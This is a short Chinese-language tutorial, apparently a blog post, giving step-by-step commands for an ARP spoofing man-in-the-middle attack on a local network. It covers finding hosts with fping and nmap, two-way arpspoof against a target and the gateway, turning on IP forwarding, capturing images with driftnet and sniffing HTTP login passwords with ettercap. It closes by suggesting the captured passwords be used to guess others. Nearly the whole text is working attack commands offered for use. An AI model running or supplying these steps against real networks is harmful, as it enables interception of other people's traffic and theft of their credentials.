局域網arp欺騙
發現目標ip
fping -g -r 0 -s 192.168.1.0/24 | grep alive
192.168.1.1 is alive(網關)
192.168.1.107 is alive(我的電腦)
192.168.1.103 is alive
192.168.1.105 is alive
系統檢測
nmap -T4 -O 192.169.1.103 192.168.1.105 #后面ip是待檢測的ip
找到目標
arp欺騙
arpspoof -i eth0(網卡) -t 192.168.1.103(目標ip) 192.168.1.1(網關)
arpspoof -i eth0(網卡) -t 192.168.1.1(網關) 192.168.1.103(目標ip)
進行雙向欺騙
這時我手機上不了網了,造成斷網假象
附:arpspoof命令安裝
sudo apt-get install dsniff ssldump#不行就重啟一下
進行端口轉發
echo 1 > /proc/sys/net/ipv4/ip_forward
#如果權限不夠就:sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
cat /proc/sys/net/ipv4/ip_forward
發現輸出為1
這時手機就能上網了
進行圖片嗅探(http協議的)
driftnet -i eth0
附:driftnet安裝
sudo apt-get install driftnet
嗅探登錄密碼(http)
ettercap -Tq -i eth0
可以根據社會工程學,密碼唯一性,推測其他密碼
————————————————